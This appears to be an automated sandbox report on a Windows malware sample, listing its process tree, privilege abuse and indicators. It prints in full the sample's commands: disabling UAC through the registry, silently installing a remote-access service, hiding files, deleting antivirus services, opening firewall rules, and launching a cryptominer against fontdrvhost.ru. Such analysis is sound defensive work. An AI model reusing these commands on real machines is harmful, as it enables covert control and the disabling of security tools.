3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3804	taskhostw.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
648	Process not Found
648	Process not Found
648	Process not Found

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
1904	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 57 IoCs

description	pid	Process
Token: SeDebugPrivilege	4576	rutserv.exe
Token: SeDebugPrivilege	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 8444563643668182784	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 850	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 17614262791034696090	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: SeCreateTokenPrivilege	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 17179869196	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 0	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 0	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 0	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 281477286448623	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 51539611648	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 70371053915631	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 51539607552	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 85030460	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 84985916	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 51539607558	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 30681189073289216	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 21673968343711744	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 31244216336121856	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 30681206253158400	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 27303506532630528	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 84927044	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 9920249032582173072	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 13972585914577190912	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 9920249032582173072	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 9799945666482024237	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 9920249032582173072	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 4294967295	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 6300534712	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 8589950976	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 36029175007041344	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 8613509171277026564	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 8613509171277026564	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 1080863910568919553	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 1080863910568919553	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 1080863910568919553	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 36028799328701935	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 6937813002834471071	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 4294967296	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 6937813002834471071	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 4853001612106399812	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 6937813002834471071	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 36029175061105288	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: 2005414712	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Token: SeDebugPrivilege	4032	rutserv.exe
Token: SeTakeOwnershipPrivilege	4612	rutserv.exe
Token: SeTcbPrivilege	4612	rutserv.exe
Token: SeTcbPrivilege	4612	rutserv.exe
Token: SeDebugPrivilege	736	taskkill.exe
Token: SeDebugPrivilege	3488	taskkill.exe
Token: SeDebugPrivilege	2340	taskkill.exe
Token: SeAuditPrivilege	832	svchost.exe
Token: SeDebugPrivilege	2772	RDPWInst.exe
Token: SeAuditPrivilege	2836	svchost.exe
Token: SeLockMemoryPrivilege	4304	MicrosoftHost.exe
Token: SeLockMemoryPrivilege	4304	MicrosoftHost.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
3272	winit.exe
4576	rutserv.exe
604	taskhost.exe
4640	cmd.exe
3804	taskhostw.exe
4032	rutserv.exe
4612	rutserv.exe
2980	R8.exe
2672	winlogon.exe
4304	MicrosoftHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3880 wrote to memory of 2772	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe	80
PID 3880 wrote to memory of 2772	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe	80
PID 3880 wrote to memory of 2772	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe	80
PID 3880 wrote to memory of 2800	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe	81
PID 3880 wrote to memory of 2800	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe	81
PID 3880 wrote to memory of 2800	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe	81
PID 2772 wrote to memory of 224	2772	wini.exe	82
PID 2772 wrote to memory of 224	2772	wini.exe	82
PID 2772 wrote to memory of 224	2772	wini.exe	82
PID 2772 wrote to memory of 3272	2772	wini.exe	83
PID 2772 wrote to memory of 3272	2772	wini.exe	83
PID 2772 wrote to memory of 3272	2772	wini.exe	83
PID 224 wrote to memory of 3456	224	WScript.exe	85
PID 224 wrote to memory of 3456	224	WScript.exe	85
PID 224 wrote to memory of 3456	224	WScript.exe	85
PID 3456 wrote to memory of 1964	3456	cmd.exe	87
PID 3456 wrote to memory of 1964	3456	cmd.exe	87
PID 3456 wrote to memory of 1964	3456	cmd.exe	87
PID 3456 wrote to memory of 4128	3456	cmd.exe	88
PID 3456 wrote to memory of 4128	3456	cmd.exe	88
PID 3456 wrote to memory of 4128	3456	cmd.exe	88
PID 3456 wrote to memory of 1832	3456	cmd.exe	89
PID 3456 wrote to memory of 1832	3456	cmd.exe	89
PID 3456 wrote to memory of 1832	3456	cmd.exe	89
PID 3456 wrote to memory of 4576	3456	cmd.exe	90
PID 3456 wrote to memory of 4576	3456	cmd.exe	90
PID 3456 wrote to memory of 4576	3456	cmd.exe	90
PID 3880 wrote to memory of 2544	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe	91
PID 3880 wrote to memory of 2544	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe	91
PID 3880 wrote to memory of 2544	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe	91
PID 3880 wrote to memory of 4768	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe	92
PID 3880 wrote to memory of 4768	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe	92
PID 3880 wrote to memory of 4768	3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe	92
PID 4768 wrote to memory of 4536	4768	cmd.exe	94
PID 4768 wrote to memory of 4536	4768	cmd.exe	94
PID 4768 wrote to memory of 4536	4768	cmd.exe	94
PID 2544 wrote to memory of 604	2544	cheat.exe	95
PID 2544 wrote to memory of 604	2544	cheat.exe	95
PID 2544 wrote to memory of 604	2544	cheat.exe	95
PID 3456 wrote to memory of 4640	3456	cmd.exe	206
PID 3456 wrote to memory of 4640	3456	cmd.exe	206
PID 3456 wrote to memory of 4640	3456	cmd.exe	206
PID 604 wrote to memory of 3804	604	taskhost.exe	97
PID 604 wrote to memory of 3804	604	taskhost.exe	97
PID 3456 wrote to memory of 4032	3456	cmd.exe	98
PID 3456 wrote to memory of 4032	3456	cmd.exe	98
PID 3456 wrote to memory of 4032	3456	cmd.exe	98
PID 4612 wrote to memory of 1004	4612	rutserv.exe	102
PID 4612 wrote to memory of 1004	4612	rutserv.exe	102
PID 4612 wrote to memory of 1004	4612	rutserv.exe	102
PID 4612 wrote to memory of 1760	4612	rutserv.exe	101
PID 4612 wrote to memory of 1760	4612	rutserv.exe	101
PID 4612 wrote to memory of 1760	4612	rutserv.exe	101
PID 604 wrote to memory of 2980	604	taskhost.exe	105
PID 604 wrote to memory of 2980	604	taskhost.exe	105
PID 604 wrote to memory of 2980	604	taskhost.exe	105
PID 2980 wrote to memory of 1736	2980	R8.exe	110
PID 2980 wrote to memory of 1736	2980	R8.exe	110
PID 2980 wrote to memory of 1736	2980	R8.exe	110
PID 1736 wrote to memory of 2460	1736	WScript.exe	109
PID 1736 wrote to memory of 2460	1736	WScript.exe	109
PID 1736 wrote to memory of 2460	1736	WScript.exe	109
PID 3456 wrote to memory of 3944	3456	Process not Found	162
PID 3456 wrote to memory of 3944	3456	Process not Found	162

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3944	attrib.exe
2040	attrib.exe
5008	attrib.exe
3272	attrib.exe
4060	attrib.exe

C:\Users\Admin\AppData\Local\Temp\3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
"C:\Users\Admin\AppData\Local\Temp\3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3880
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2772
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:224
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3456
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        5⤵
        UAC bypass
        Windows security bypass
        Runs .reg file with regedit
        
        PID:1964
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:4128
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:1832
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4576
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        
        PID:4640
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4032
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        Views/modifies file attributes
        
        PID:3944
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:2040
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        Launches sc.exe
        
        PID:2024
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        Launches sc.exe
        
        PID:5080
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        Launches sc.exe
        
        PID:2936
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:3272
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
      4⤵
      PID:3204
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:4512
- C:\ProgramData\install\sys.exe
  C:\ProgramData\install\sys.exe
  2⤵
  - Executes dropped EXE
  PID:2800
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2544
- - C:\ProgramData\Microsoft\Intel\taskhost.exe
    "C:\ProgramData\Microsoft\Intel\taskhost.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:604
  - - C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      4⤵
      Modifies visiblity of hidden/system files in Explorer
      Executes dropped EXE
      Adds Run key to start application
      NTFS ADS
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:3804
    - - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2672
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        6⤵
        
        PID:3512
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        7⤵
        
        PID:4008
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        5⤵
        
        PID:4804
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        6⤵
        Gathers network information
        
        PID:2444
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        5⤵
        
        PID:4576
      - C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        6⤵
        
        PID:4920
    - - C:\ProgramData\WindowsTask\MicrosoftHost.exe
        
        C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://fontdrvhost.ru:3333 -u CPU --donate-level=1 -k -t1
        5⤵
        Detected Stratum cryptominer command
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4304
  - - C:\programdata\microsoft\intel\R8.exe
      C:\programdata\microsoft\intel\R8.exe
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2980
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1736
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appidsvc
      4⤵
      PID:3148
    - - C:\Windows\SysWOW64\sc.exe
        
        sc start appidsvc
        5⤵
        Launches sc.exe
        
        PID:2532
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appmgmt
      4⤵
      PID:3472
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
      4⤵
      PID:3684
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config appidsvc start= auto
        5⤵
        Launches sc.exe
        
        PID:5056
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
      4⤵
      PID:4696
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config appmgmt start= auto
        5⤵
        Launches sc.exe
        
        PID:2680
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      4⤵
      PID:4592
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete swprv
        5⤵
        Launches sc.exe
        
        PID:708
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop mbamservice
      4⤵
      PID:4064
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop mbamservice
        5⤵
        Launches sc.exe
        
        PID:4692
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
      4⤵
      PID:2488
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop bytefenceservice
        5⤵
        Launches sc.exe
        
        PID:4640
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
      4⤵
      PID:2208
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete bytefenceservice
        5⤵
        Launches sc.exe
        
        PID:2068
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete mbamservice
      4⤵
      PID:4940
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete mbamservice
        5⤵
        Launches sc.exe
        
        PID:2596
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete crmsvc
      4⤵
      PID:4584
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete crmsvc
        5⤵
        Launches sc.exe
        
        PID:4048
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete "windows node"
      4⤵
      PID:4072
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
      4⤵
      PID:3412
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop Adobeflashplayer
        5⤵
        Launches sc.exe
        
        PID:5092
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
      4⤵
      PID:3596
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete AdobeFlashPlayer
        5⤵
        Launches sc.exe
        
        PID:2800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop MoonTitle
      4⤵
      PID:2008
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop MoonTitle
        5⤵
        Launches sc.exe
        
        PID:4460
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
      4⤵
      PID:4628
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete MoonTitle"
        5⤵
        Launches sc.exe
        
        PID:5024
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
      4⤵
      PID:3600
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5056
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop clr_optimization_v4.0.30318_64
        5⤵
        Launches sc.exe
        
        PID:320
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
      4⤵
      PID:440
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete clr_optimization_v4.0.30318_64"
        5⤵
        Launches sc.exe
        
        PID:4880
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
      4⤵
      PID:2368
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop MicrosoftMysql
        5⤵
        Launches sc.exe
        
        PID:3156
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      4⤵
      PID:4000
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2488
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        5⤵
        Modifies Windows Firewall
        
        PID:4684
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4640
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set allprofiles state on
        5⤵
        Modifies Windows Firewall
        
        PID:2400
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
      4⤵
      PID:832
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete MicrosoftMysql
        5⤵
        Launches sc.exe
        
        PID:4764
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      4⤵
      PID:2196
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        5⤵
        Modifies Windows Firewall
        
        PID:1312
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      4⤵
      PID:4100
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        5⤵
        Modifies Windows Firewall
        
        PID:800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      4⤵
      PID:4928
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        5⤵
        Modifies Windows Firewall
        
        PID:3136
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      PID:3588
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:3620
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4472
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      PID:1460
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:1984
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      PID:4184
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:1756
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      PID:2076
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:3716
